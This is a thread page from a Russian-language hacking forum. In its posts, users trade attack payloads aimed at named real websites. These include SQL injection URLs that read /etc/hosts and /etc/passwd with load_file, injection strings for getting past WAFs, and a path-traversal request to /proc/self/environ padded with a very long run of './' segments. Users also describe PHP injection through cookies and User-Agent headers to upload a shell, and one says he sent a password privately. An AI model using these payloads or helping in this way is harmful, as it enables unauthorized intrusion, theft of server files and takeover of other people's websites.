HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 12 из 296 « Первая < 2 8 9 10 11 12 13 14 15 16 2262112 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 25.05.2015, 12:23
huntercs16
Guest
Сообщений: n/a
Провел на форуме:
35200

Репутация: 6
По умолчанию
Помогите найти папку, в которой сайт лежит.

Перебрал стандартные httpd conf пути-не подходит.

http://sovita.ru/index.php?bpath=/m...t+1,2,3,4,5,6,7,load_file('/etc/hosts'),9+--+
 
Ответить с цитированием

  #112  
Старый 25.05.2015, 12:57
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
http://www.sovita.ru/forum/support.php

Пасс в личку кинул
 
Ответить с цитированием

  #113  
Старый 25.05.2015, 14:28
huntercs16
Guest
Сообщений: n/a
Провел на форуме:
35200

Репутация: 6
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:

http://www.sovita.ru/forum/support.php
Пасс в личку кинул
http://tele-club.ru/buyticket?event_...2,3,load_file("/etc/hosts"),5,6,7,8,9,10+--+;

А тут можно директорию определить?

/etc/passwd говорит о том что сайт может лежать в

/var/www/m.tele-club.ru/data/robots.txt

Но конкретно эту не хочет читать...
 
Ответить с цитированием

  #114  
Старый 25.05.2015, 15:13
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Цитата:
Сообщение от huntercs16  
huntercs16 said:

http://tele-club.ru/buyticket?event_...2,3,load_file(
"/etc/hosts"),5,6,7,8,9,10+--+;
А тут можно директорию определить?
/etc/passwd говорит о том что сайт может лежать в
/var/www/m.tele-club.ru/data/robots.txt
Но конкретно эту не хочет читать...
{ШЕЛЛЫ тоже запрещено выкладывать, логины и пароли тоже} ps нахтак

Опять же, по базам лазить нужно, там пути искать, а не только пытаться инклудить конфиги

Пароли от форума или админки поискать, и сразу уже залиться.

/var/www/tele-club.ru/www/forum/ вот такой путь получился
 
Ответить с цитированием

  #115  
Старый 25.05.2015, 16:21
off
Познающий
Регистрация: 21.08.2006
Сообщений: 31
Провел на форуме:
450990

Репутация: 21
По умолчанию
Добрый день.

Есть сервер под управлением Ubuntu 12.04, на нем стоит mongodb 2.4.14 на которой настроена авторизация, но есть доступ. А так же redis 2.4.13, доступ тоже есть. В redis хранятся сессии от node.js (express.js).

Возможно ли каким-либо образом получить доступ к ОС ? Или прочитать файл .js (местоположение на сервере известно) или получить доступ к админке (путь известен и логин админа тоже).

По redis, нашел описание уязвимости по модификации местоположения файла dump.rdb (http://www.agarri.fr/kom/archives/20...sts/index.html), но эксплуатация не удается, файл создается но содержимое его видимо в бинарном виде.
 
Ответить с цитированием

  #116  
Старый 25.05.2015, 22:01
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
.SpoilerTarget" type="button">Spoiler: link
http://www.inkaddict.com/search.php
Можно как нибудь это заиспользовать?

И что тут можно сделать?

http://visotsky.org/ru/search?q=(dsfsdf
 
Ответить с цитированием

  #117  
Старый 26.05.2015, 16:41
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
куча waf всяких. Можно как нибудь обойти на нормальный вывод?

http://scdistribution.com/resources.html?q_release=-2015-05-12'+or+substring(@@version,1,1)=5+--+

и все равно ругается на многие комбинации.
 
Ответить с цитированием

  #118  
Старый 27.05.2015, 19:48
huntercs16
Guest
Сообщений: n/a
Провел на форуме:
35200

Репутация: 6
По умолчанию
Цитата:
При постановке данных в куки и Юзер агент работает phpinfo(), но не осмысленный код, который позволяет залиться.

Пробовал в куки ставить

Опять же сложный код не работает

Что сделать можно?

$_POST[c]=/*$s='/home/virtualki/18281'*/;echo '111';echo 222; = работает

$_POST[c]=$s='/home/virtualki/18281';echo '111';echo 222; =не работает

echo('111');echo 222; -работает

Залился, помог base64
 
Ответить с цитированием

  #119  
Старый 27.05.2015, 23:11
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию
Можно было попробовать еще через

/proc/self/environ

в User-agent например вставляешь php код
 
Ответить с цитированием

  #120  
Старый 28.05.2015, 18:49
huntercs16
Guest
Сообщений: n/a
Провел на форуме:
35200

Репутация: 6
По умолчанию
Код:
Code:
http://pelczar.rzeszow.pl/duszpasterstwoszpitala/index.php?action=aktualnosci/../../../../../../../../../../../../../../../proc/self/environ/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
Тоже енвайрон. Что сделать можно?

В данном случае base64 не помог
 
Ответить с цитированием
Ответ
Страница 12 из 296 « Первая < 2 8 9 10 11 12 13 14 15 16 2262112 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ